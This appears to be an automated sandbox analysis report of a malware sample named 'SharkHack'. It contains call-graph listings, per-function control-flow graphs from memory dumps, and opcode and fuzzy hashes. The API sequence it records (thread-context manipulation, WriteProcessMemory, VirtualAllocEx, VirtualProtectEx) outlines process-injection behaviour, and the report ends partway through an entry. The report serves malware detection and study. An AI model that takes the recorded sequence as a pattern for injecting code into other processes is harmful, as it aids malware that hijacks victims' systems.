60639->60642 60643 89c8a30 VirtualProtect 60639->60643 60640 89c6dfb 60641->60640 60642->60640 60643->60640 60646 89c8adf VirtualProtect 60644->60646 60647 89c8a28 VirtualProtect 60644->60647 60648 89c8a30 VirtualProtect 60644->60648 60645 89c7593 60646->60645 60647->60645 60648->60645 60650 89c8a76 VirtualProtect 60649->60650 60652 89c8aea 60649->60652 60651 89c8ab2 60650->60651 60651->60608 60652->60608 60654 89c8a78 VirtualProtect 60653->60654 60655 89c8ab2 60654->60655 60655->60608 60657 89c8a30 VirtualProtect 60656->60657 60659 89c8ab2 60657->60659 60659->60608 60660 89caeb0 60661 89caee3 60660->60661 60662 89cb311 60661->60662 60667 89cd8b8 60661->60667 60671 89cd3b0 60661->60671 60675 59d1b30 60661->60675 60681 59d1b40 60661->60681 60668 89cd8bc 60667->60668 60669 89cd9a3 60668->60669 60686 89cfc40 60668->60686 60669->60661 60672 89cd3be 60671->60672 60673 89cd3c5 60671->60673 60672->60661 60673->60672 60674 89cfc40 CreateProcessAsUserW 60673->60674 60674->60673 60677 59d1b34 60675->60677 60676 59d1acf 60676->60661 60677->60676 60679 8a0ff10 Wow64GetThreadContext 60677->60679 60680 8a0ff18 Wow64GetThreadContext 60677->60680 60678 59d1cdf 60678->60661 60679->60678 60680->60678 60682 59d1b44 60681->60682 60684 8a0ff10 Wow64GetThreadContext 60682->60684 60685 8a0ff18 Wow64GetThreadContext 60682->60685 60683 59d1cdf 60683->60661 60684->60683 60685->60683 60687 89cfcbf CreateProcessAsUserW 60686->60687 60689 89cfdc0 60687->60689 60690 59d3130 60691 59d3175 Wow64SetThreadContext 60690->60691 60693 59d31bd 60691->60693 60710 59d2770 60711 59d2774 60710->60711 60713 8a0ff10 Wow64GetThreadContext 60711->60713 60714 8a0ff18 Wow64GetThreadContext 60711->60714 60712 59d290e 60713->60712 60714->60712 60715 59d2270 60717 59d2297 60715->60717 60716 59d239f 60717->60716 60718 8a0ff10 Wow64GetThreadContext 60717->60718 60719 8a0ff18 Wow64GetThreadContext 60717->60719 60718->60717 60719->60717 60720 602106c 60722 602102a 60720->60722 60721 6021032 OutputDebugStringW 60723 602104f 60721->60723 60722->60721 60724 6021082 60722->60724 60725 8a0fc50 60726 8a0fc54 VirtualProtect 60725->60726 60728 8a0fcd2 60726->60728 60532 59d3208 60533 59d322c 60532->60533 60537 8a0ff10 60533->60537 60541 8a0ff18 60533->60541 60534 59d3308 60538 8a0ff38 60537->60538 60545 59d15c8 60538->60545 60539 8a0ff68 60539->60534 60543 8a0ff38 60541->60543 60542 8a0ff68 60542->60534 60544 59d15c8 Wow64GetThreadContext 60543->60544 60544->60542 60546 59d15e8 60545->60546 60547 59d15ff 60546->60547 60549 59d1678 60546->60549 60547->60539 60551 59d167c 60549->60551 60550 59d1652 60550->60547 60551->60550 60552 59d16e5 Wow64GetThreadContext 60551->60552 60553 59d170d 60552->60553 60553->60547 60699 59d24a8 60700 59d24ac WriteProcessMemory 60699->60700 60702 59d2547 60700->60702 60706 59d2948 60707 59d294c VirtualProtectEx 60706->60707 60709 59d29ce 60707->60709 60729 59d1d68 60730 59d1d6c VirtualAllocEx 60729->60730 60732 59d1de5 60730->60732 60554 602299f 60555 60229af 60554->60555 60556 6023bf2 60555->60556 60559 8ef47e0 60555->60559 60563 8ef47d0 60555->60563 60560 8ef4812 60559->60560 60567 8efb830 60560->60567 60561 8ef9fee 60561->60556 60564 8ef47e0 60563->60564 60566 8efb830 DeleteFileW 60564->60566 60565 8ef9fee 60565->60556 60566->60565 60572 8efb9ae 60567->60572 60576 8efb9c0 60567->60576 60580 8efb9c8 60567->60580 60568 8efb85b 60568->60561 60573 8efb9f0 60572->60573 60574 8efbc83 60573->60574 60584 8efc075 60573->60584 60574->60568 60577 8efb9c8 60576->60577 60578 8efbc83 60577->60578 60579 8efc075 DeleteFileW 60577->60579 60578->60568 60579->60578 60581 8efb9de 60580->60581 60582 8efbc83 60581->60582 60583 8efc075 DeleteFileW 60581->60583 60582->60568 60583->60582 60586 8efc087 60584->60586 60588 8efc035 60584->60588 60585 8efc16a DeleteFileW 60587 8efc197 60585->60587 60586->60585 60586->60588 60587->60574 60588->60574

                                                                                                          Executed Functions

                                                                                                          Function 059D0006 Relevance: 6.5, Strings: 5, Instructions: 219COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1187 59d0006-59d0031 1188 59d00a6-59d00a7 1187->1188 1189 59d0033-59d005e 1187->1189 1191 59d00a8-59d00b4 1188->1191 1192 59d0062-59d0065 1188->1192 1189->1192 1195 59d00bd-59d00be 1191->1195 1196 59d00b6 1191->1196 1193 59d006c-59d0090 1192->1193 1194 59d0067-59d006b 1192->1194 1203 59d0091 1193->1203 1194->1193 1209 59d00c3-59d00e7 1195->1209 1210 59d02e3-59d02ec 1195->1210 1197 59d02be-59d02d0 1196->1197 1198 59d0238-59d0250 1196->1198 1199 59d019a-59d01ad 1196->1199 1200 59d02d5-59d02de 1196->1200 1201 59d0216-59d0219 1196->1201 1202 59d0156-59d016e 1196->1202 1196->1203 1204 59d0110-59d0118 1196->1204 1205 59d01b2-59d01e5 1196->1205 1206 59d01ed 1196->1206 1207 59d00e9-59d00fa 1196->1207 1208 59d0283-59d02b6 1196->1208 1196->1209 1196->1210 1211 59d0098-59d00a5 1197->1211 1225 59d0263-59d026a 1198->1225 1226 59d0252-59d0261 1198->1226 1199->1211 1200->1211 1223 59d0222-59d0233 1201->1223 1229 59d0181-59d0188 1202->1229 1230 59d0170-59d017f 1202->1230 1203->1211 1213 59d011f-59d012a 1204->1213 1205->1206 1237 59d01f0 call 59d0338 1206->1237 1238 59d01f0 call 59d0348 1206->1238 1227 59d00fc-59d010e 1207->1227 1228 59d011a-59d011c 1207->1228 1208->1197 1209->1211 1211->1188 1219 59d013d-59d0144 1213->1219 1220 59d012c-59d013b 1213->1220 1224 59d014b-59d0151 1219->1224 1220->1224 1221 59d01f6-59d0211 1221->1211 1223->1211 1224->1211 1231 59d0271-59d027e 1225->1231 1226->1231 1227->1211 1228->1213 1233 59d018f-59d0195 1229->1233 1230->1233 1231->1211 1233->1211 1237->1221 1238->1221
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: e\1$e\1$e\1$"*p$"*p
                                                                                                          • API String ID: 0-3583356755
                                                                                                          • Opcode ID: 77b5f9b4c46433b453157c345a9417f815489845793cd636f5f92e1a478ed935
                                                                                                          • Instruction ID: 9302f5be4b7893806d7a48841d36f88323fa7ac7df14768b193f6b3af76a3c6e
                                                                                                          • Opcode Fuzzy Hash: 77b5f9b4c46433b453157c345a9417f815489845793cd636f5f92e1a478ed935
                                                                                                          • Instruction Fuzzy Hash: 309134B4D052589FCB04CFA5D9486EEFBF2BF89300F24886AD416BB250E7745A06CF65
                                                                                                          Function 059D0040 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1239 59d0040-59d005e 1240 59d0062-59d0065 1239->1240 1241 59d006c-59d0090 1240->1241 1242 59d0067-59d006b 1240->1242 1243 59d0091 1241->1243 1242->1241 1245 59d0098-59d00a7 1243->1245 1245->1240 1247 59d00a8-59d00b4 1245->1247 1248 59d00bd-59d00be 1247->1248 1249 59d00b6 1247->1249 1261 59d00c3-59d00e7 1248->1261 1262 59d02e3-59d02ec 1248->1262 1249->1243 1250 59d02be-59d02d0 1249->1250 1251 59d0238-59d0250 1249->1251 1252 59d019a-59d01ad 1249->1252 1253 59d02d5-59d02de 1249->1253 1254 59d0216-59d0219 1249->1254 1255 59d0156-59d016e 1249->1255 1256 59d0110-59d0118 1249->1256 1257 59d01b2-59d01e5 1249->1257 1258 59d01ed 1249->1258 1259 59d00e9-59d00fa 1249->1259 1260 59d0283-59d02b6 1249->1260 1249->1261 1249->1262 1250->1245 1275 59d0263-59d026a 1251->1275 1276 59d0252-59d0261 1251->1276 1252->1245 1253->1245 1273 59d0222-59d0233 1254->1273 1279 59d0181-59d0188 1255->1279 1280 59d0170-59d017f 1255->1280 1263 59d011f-59d012a 1256->1263 1257->1258 1287 59d01f0 call 59d0338 1258->1287 1288 59d01f0 call 59d0348 1258->1288 1277 59d00fc-59d010e 1259->1277 1278 59d011a-59d011c 1259->1278 1260->1250 1261->1245 1269 59d013d-59d0144 1263->1269 1270 59d012c-59d013b 1263->1270 1274 59d014b-59d0151 1269->1274 1270->1274 1271 59d01f6-59d0211 1271->1245 1273->1245 1274->1245 1281 59d0271-59d027e 1275->1281 1276->1281 1277->1245 1278->1263 1283 59d018f-59d0195 1279->1283 1280->1283 1281->1245 1283->1245 1287->1271 1288->1271
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: e\1$e\1$e\1$"*p$"*p
                                                                                                          • API String ID: 0-3583356755
                                                                                                          • Opcode ID: 700bcf3f276d8bf7abb27e8e7f53b732079c6978bf00e8f0863fbb25c2a95f62
                                                                                                          • Instruction ID: a5fc0905d1ac9373cebbc92c649b7931321f1a3d8f23bf64654a6b58c7e50f4c
                                                                                                          • Opcode Fuzzy Hash: 700bcf3f276d8bf7abb27e8e7f53b732079c6978bf00e8f0863fbb25c2a95f62
                                                                                                          • Instruction Fuzzy Hash: 378101B0D052199FCB58CFA5D9486AEFBF2BF88300F24982AD416BB254E7745A05CF64
                                                                                                          Function 08744D2B Relevance: 5.5, Instructions: 5530COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1482 8744d2b-8744f79 1510 8744f7f-8745cef 1482->1510 1511 8746f6b-87471ef 1482->1511 1933 8745cf5-8745fe6 1510->1933 1934 8745fee-8746f63 1510->1934 1578 87471f5-87481e6 1511->1578 1579 87481ee-874916d 1511->1579 1578->1579 2149 8749173-8749474 1579->2149 2150 874947c-874948f 1579->2150 1933->1934 1934->1511 2149->2150 2155 8749495-8749a87 2150->2155 2156 8749a8f-874a9f7 2150->2156 2155->2156 2549 874a9f7 call 874c340 2156->2549 2550 874a9f7 call 874c2f8 2156->2550 2548 874a9fd-874aa04 2549->2548 2550->2548
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0260e2097f08e3d36634453433b5d91a75ba84235a0b89fd54a2e4af7af53a0c
                                                                                                          • Instruction ID: 42cad2c2dec1edff33952a0b7cbc906b704d0288e6ad0b8849dd6c2ed54a3c14
                                                                                                          • Opcode Fuzzy Hash: 0260e2097f08e3d36634453433b5d91a75ba84235a0b89fd54a2e4af7af53a0c
                                                                                                          • Instruction Fuzzy Hash: 40B30874A41229CBDB54EF78E98469CBBF2EB89214F4084EED049A7354DF349E89CF41
                                                                                                          Function 08744D40 Relevance: 5.5, Instructions: 5524COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2551 8744d40-8744f79 2579 8744f7f-8745cef 2551->2579 2580 8746f6b-87471ef 2551->2580 3002 8745cf5-8745fe6 2579->3002 3003 8745fee-8746f63 2579->3003 2647 87471f5-87481e6 2580->2647 2648 87481ee-874916d 2580->2648 2647->2648 3218 8749173-8749474 2648->3218 3219 874947c-874948f 2648->3219 3002->3003 3003->2580 3218->3219 3224 8749495-8749a87 3219->3224 3225 8749a8f-874a9f7 3219->3225 3224->3225 3618 874a9f7 call 874c340 3225->3618 3619 874a9f7 call 874c2f8 3225->3619 3617 874a9fd-874aa04 3618->3617 3619->3617
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889664682.0000000008740000.00000040.00000800.00020000.00000000.sdmp, Offset: 08740000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8740000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1e7bd1d8508bd7cea27af80851fbfd48d35aa01e01c8924b169ec463e2a192f
                                                                                                          • Instruction ID: 4f88f32dc3c0e6e928085d4c873e7a334a01bf2a9810fd7637beb15c5e5566e0
                                                                                                          • Opcode Fuzzy Hash: c1e7bd1d8508bd7cea27af80851fbfd48d35aa01e01c8924b169ec463e2a192f
                                                                                                          • Instruction Fuzzy Hash: 6EB30874A41229CBDB54EF78E98469CBBF2EB89214F4084EED049A7354DF349E89CF41
                                                                                                          Function 01F97630 Relevance: 5.5, Strings: 4, Instructions: 453COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 3620 1f97630-1f97666 3746 1f97668 call 1f97009 3620->3746 3747 1f97668 call 1f97630 3620->3747 3621 1f9766e-1f97674 3622 1f976c4-1f976c8 3621->3622 3623 1f97676-1f9767a 3621->3623 3626 1f976ca-1f976d9 3622->3626 3627 1f976df-1f976f3 3622->3627 3624 1f97689-1f97690 3623->3624 3625 1f9767c-1f97681 3623->3625 3628 1f97766-1f977a3 3624->3628 3629 1f97696-1f9769d 3624->3629 3625->3624 3630 1f976db-1f976dd 3626->3630 3631 1f97705-1f9770f 3626->3631 3632 1f976fb-1f97702 3627->3632 3642 1f977ae-1f977ce 3628->3642 3643 1f977a5-1f977ab 3628->3643 3629->3622 3633 1f9769f-1f976a3 3629->3633 3630->3632 3634 1f97719-1f9771d 3631->3634 3635 1f97711-1f97717 3631->3635 3636 1f976b2-1f976b9 3633->3636 3637 1f976a5-1f976aa 3633->3637 3639 1f97725-1f9775f 3634->3639 3640 1f9771f 3634->3640 3635->3639 3636->3628 3641 1f976bf-1f976c2 3636->3641 3637->3636 3639->3628 3640->3639 3641->3632 3648 1f977d0 3642->3648 3649 1f977d5-1f977dc 3642->3649 3643->3642 3651 1f97b64-1f97b6d 3648->3651 3652 1f977de-1f977e9 3649->3652 3653 1f977ef-1f97802 3652->3653 3654 1f97b75-1f97b9e 3652->3654 3659 1f97818-1f97833 3653->3659 3660 1f97804-1f97812 3653->3660 3664 1f97835-1f9783b 3659->3664 3665 1f97857-1f9785a 3659->3665 3660->3659 3663 1f97aec-1f97af3 3660->3663 3663->3651 3666 1f97af5-1f97af7 3663->3666 3669 1f9783d 3664->3669 3670 1f97844-1f97847 3664->3670 3667 1f97860-1f97863 3665->3667 3668 1f979b4-1f979ba 3665->3668 3673 1f97af9-1f97afe 3666->3673 3674 1f97b06-1f97b0c 3666->3674 3667->3668 3677 1f97869-1f9786f 3667->3677 3672 1f97aa6-1f97aa9 3668->3672 3676 1f979c0-1f979c5 3668->3676 3669->3668 3669->3670 3671 1f9787a-1f97880 3669->3671 3669->3672 3670->3671 3675 1f97849-1f9784c 3670->3675 3682 1f97882-1f97884 3671->3682 3683 1f97886-1f97888 3671->3683 3684 1f97aaf-1f97ab5 3672->3684 3685 1f97b70 3672->3685 3673->3674 3674->3654 3680 1f97b0e-1f97b13 3674->3680 3678 1f97852 3675->3678 3679 1f978e6-1f978ec 3675->3679 3676->3672 3677->3668 3681 1f97875 3677->3681 3678->3672 3679->3672 3688 1f978f2-1f978f8 3679->3688 3686 1f97b58-1f97b5b 3680->3686 3687 1f97b15-1f97b1a 3680->3687 3681->3672 3689 1f97892-1f9789b 3682->3689 3683->3689 3690 1f97ada-1f97ade 3684->3690 3691 1f97ab7-1f97abf 3684->3691 3685->3654 3686->3685 3692 1f97b5d-1f97b62 3686->3692 3687->3685 3693 1f97b1c 3687->3693 3694 1f978fa-1f978fc 3688->3694 3695 1f978fe-1f97900 3688->3695 3697 1f9789d-1f978a8 3689->3697 3698 1f978ae-1f978d6 3689->3698 3690->3663 3699 1f97ae0-1f97ae6 3690->3699 3691->3654 3696 1f97ac5-1f97ad4 3691->3696 3692->3651 3692->3666 3700 1f97b23-1f97b28 3693->3700 3701 1f9790a-1f97921 3694->3701 3695->3701 3696->3659 3696->3690 3697->3672 3697->3698 3719 1f979ca-1f97a00 3698->3719 3720 1f978dc-1f978e1 3698->3720 3699->3652 3699->3663 3703 1f97b4a-1f97b4c 3700->3703 3704 1f97b2a-1f97b2c 3700->3704 3713 1f9794c-1f97973 3701->3713 3714 1f97923-1f9793c 3701->3714 3703->3685 3710 1f97b4e-1f97b51 3703->3710 3707 1f97b3b-1f97b41 3704->3707 3708 1f97b2e-1f97b33 3704->3708 3707->3654 3712 1f97b43-1f97b48 3707->3712 3708->3707 3710->3686 3712->3703 3715 1f97b1e-1f97b21 3712->3715 3713->3685 3725 1f97979-1f9797c 3713->3725 3714->3719 3723 1f97942-1f97947 3714->3723 3715->3685 3715->3700 3726 1f97a0d-1f97a15 3719->3726 3727 1f97a02-1f97a06 3719->3727 3720->3719 3723->3719 3725->3685 3728 1f97982-1f979ab 3725->3728 3726->3685 3731 1f97a1b-1f97a20 3726->3731 3729 1f97a08-1f97a0b 3727->3729 3730 1f97a25-1f97a29 3727->3730 3728->3719 3743 1f979ad-1f979b2 3728->3743 3729->3726 3729->3730 3732 1f97a48-1f97a4c 3730->3732 3733 1f97a2b-1f97a31 3730->3733 3731->3672 3735 1f97a4e-1f97a54 3732->3735 3736 1f97a56-1f97a72 3732->3736 3733->3732 3737 1f97a33-1f97a3b 3733->3737 3735->3736 3738 1f97a7b-1f97a7f 3735->3738 3744 1f97a75 call 1f97d58 3736->3744 3745 1f97a75 call 1f97c58 3736->3745 3737->3685 3739 1f97a41-1f97a46 3737->3739 3738->3672 3741 1f97a81-1f97a9d 3738->3741 3739->3672 3741->3672 3743->3719 3744->3738 3745->3738 3746->3621 3747->3621
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (o^q$(o^q$,bq$,bq
                                                                                                          • API String ID: 0-879173519
                                                                                                          • Opcode ID: 0d7bf67f473c37c837b50a80ea5a37decf7cc2551e2369919e3db481bd602aaf
                                                                                                          • Instruction ID: c12d2eb566bb564315215322d5f9f4c090557a80421b5f37c9868d8ad20a0e15
                                                                                                          • Opcode Fuzzy Hash: 0d7bf67f473c37c837b50a80ea5a37decf7cc2551e2369919e3db481bd602aaf
                                                                                                          • Instruction Fuzzy Hash: 3D024C71E10209DFEF15EFA9C884AADBBB2FF88300F188565E505AB261D736E941CF51
                                                                                                          Function 08EF47E0 Relevance: 5.2, Instructions: 5246COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 5004 8ef47e0-8ef9fe8 call 8efae30 call 8efb0d9 call 8efb830 5974 8ef9fee-8ef9ff5 5004->5974
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2890193084.0000000008EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08EF0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8ef0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8d74219a1565049d83e4d60e0578bc37a628c1467a160a4fb304b74fea1e2cad
                                                                                                          • Instruction ID: 56b5bd8bbd58ff08a3f72768ff87533e69e394f765557c6ffa2517cd86b0495c
                                                                                                          • Opcode Fuzzy Hash: 8d74219a1565049d83e4d60e0578bc37a628c1467a160a4fb304b74fea1e2cad
                                                                                                          • Instruction Fuzzy Hash: 14B31B70A11228CBC754EF39EA8469CBBF2FB89214F4084EAD48CA7351DE349D89DF55
                                                                                                          Function 08A0AD50 Relevance: 4.2, Strings: 2, Instructions: 1672COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$G
                                                                                                          • API String ID: 0-2525716807
                                                                                                          • Opcode ID: ba5593723e3d2635168a40be8621a69752313a72ba3590a1c578f6b3ec84943a
                                                                                                          • Instruction ID: 376e2fce8b8cd9b35746c1ada8719a6ca7367ae768aa5a5375faa38b81e5d7a0
                                                                                                          • Opcode Fuzzy Hash: ba5593723e3d2635168a40be8621a69752313a72ba3590a1c578f6b3ec84943a
                                                                                                          • Instruction Fuzzy Hash: B7D29E30A08314CFD705AF78D8947ADBBB1FF89714F4185EAD488E7291DA389D4ACB52
                                                                                                          Function 089C8B38 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 6f$6f$$^q
                                                                                                          • API String ID: 0-2554587936
                                                                                                          • Opcode ID: f9d2cebea98846a1ade9eebd82f19607f7921cdd4952433cc36f607fa1181af7
                                                                                                          • Instruction ID: 815b56d8fc03eaf6367d6850e9266e347ec5c38cd9f688422f5077b1175b7b7a
                                                                                                          • Opcode Fuzzy Hash: f9d2cebea98846a1ade9eebd82f19607f7921cdd4952433cc36f607fa1181af7
                                                                                                          • Instruction Fuzzy Hash: DC71C074E00208DFDB58DFA5D98459EBBB2FF88301F20842AD50ABB394DB359946CF51
                                                                                                          Function 08A06B88 Relevance: 3.4, Instructions: 3366COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889982132.0000000008A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_8a00000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 56d9e252ce734f77afb1ff42c440e0dfd51b3ea7e69887b3a3c5e093669c195e
                                                                                                          • Instruction ID: 886a6e64828e4fec6d2ed9184776e724250accb63f7aa56fe730955990e293f9
                                                                                                          • Opcode Fuzzy Hash: 56d9e252ce734f77afb1ff42c440e0dfd51b3ea7e69887b3a3c5e093669c195e
                                                                                                          • Instruction Fuzzy Hash: C4538E70A15625CBC714EF78DD8479DBBB5FF89304F4084E9D088A7251DA38AE8ACF16
                                                                                                          Function 01F97009 Relevance: 3.0, Strings: 2, Instructions: 513COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2851633688.0000000001F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F90000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_1f90000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (o^q$Hbq
                                                                                                          • API String ID: 0-662517225
                                                                                                          • Opcode ID: a1bc8486d41719a9ef5a8699a6d979bc3bb2973c45114c1214c445d3f4255182
                                                                                                          • Instruction ID: b6ae7436ea53c017f810103c801fe9d403c4670f57d9988b295030235571857f
                                                                                                          • Opcode Fuzzy Hash: a1bc8486d41719a9ef5a8699a6d979bc3bb2973c45114c1214c445d3f4255182
                                                                                                          • Instruction Fuzzy Hash: AA129F71A00219DFDB14EFA9C854AAEBBF6BF88300F148569E905DB391EB319D41CF90
                                                                                                          Function 059D0348 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q$PH^q
                                                                                                          • API String ID: 0-1598597984
                                                                                                          • Opcode ID: 32a542f9bcbce97c9f6a9f1bc24c53cbc3c04152187f8e3d4d82244a9214ccc7
                                                                                                          • Instruction ID: 44306daf4ba364ac848e915959a52e803121fa87ea563a180944908958b89b0e
                                                                                                          • Opcode Fuzzy Hash: 32a542f9bcbce97c9f6a9f1bc24c53cbc3c04152187f8e3d4d82244a9214ccc7
                                                                                                          • Instruction Fuzzy Hash: A7A12774E05209CFCB08CFAAD5886ADFBB2FB89310F10D52AD816BB254EB705945CF24
                                                                                                          Function 059D0338 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2880619802.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_59d0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: PH^q$PH^q
                                                                                                          • API String ID: 0-1598597984
                                                                                                          • Opcode ID: d7b80b4f7d6c3695738cc78e4145760e243a9473f50127eb3a565611feda5ad9
                                                                                                          • Instruction ID: 3b16e1c342ea938b0730aec27d620b992d80113aba98fcad64f4afaaa299112a
                                                                                                          • Opcode Fuzzy Hash: d7b80b4f7d6c3695738cc78e4145760e243a9473f50127eb3a565611feda5ad9
                                                                                                          • Instruction Fuzzy Hash: B4A11874E05249CFCB08CFAAD588A9DFBB2FB89310F10D52AD806BB254EB745945CF25
                                                                                                          Function 089C102F Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q$Te^q
                                                                                                          • API String ID: 0-3743469327
                                                                                                          • Opcode ID: a581c3860b65bde93d70f036a64ee3a50c2c34d11f713d6e5070ab65ba2a24f5
                                                                                                          • Instruction ID: 5d90ce5ab4fee63feb5a1bc10de6b7e7e1b193d189b39917dd67b59e95d17496
                                                                                                          • Opcode Fuzzy Hash: a581c3860b65bde93d70f036a64ee3a50c2c34d11f713d6e5070ab65ba2a24f5
                                                                                                          • Instruction Fuzzy Hash: 7D91F274E042498FDB08DFA9C8849DEBBB2FF88301F24942AD416BB365D7359906CF55
                                                                                                          Function 089C1050 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2889924060.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_89c0000_SharkHack.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Te^q$Te^q
                                                                                                          • API String ID: 0-3743469327
                                                                                                          • Opcode ID: e761654ada1996030e01d15e032c1169934a10266aadabd91ea0f73a73614b22
                                                                                                          • Instruction ID: db135a254a93075e409685224ee6ab955aa6e6eeac7f7c906b56d0095e735808
                                                                                                          • Opcode Fuzzy Hash: e761654ada1996030e01d15e032c1169934a10266aadabd91ea0f73a73614b22
                                                                                                          • Instruction Fuzzy Hash: B891D274E042098FDB08DFAAC884ADEBBB2FF88300F24942AD416BB364D7759905CF55
                                                                                                          Function 089C8B29 Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
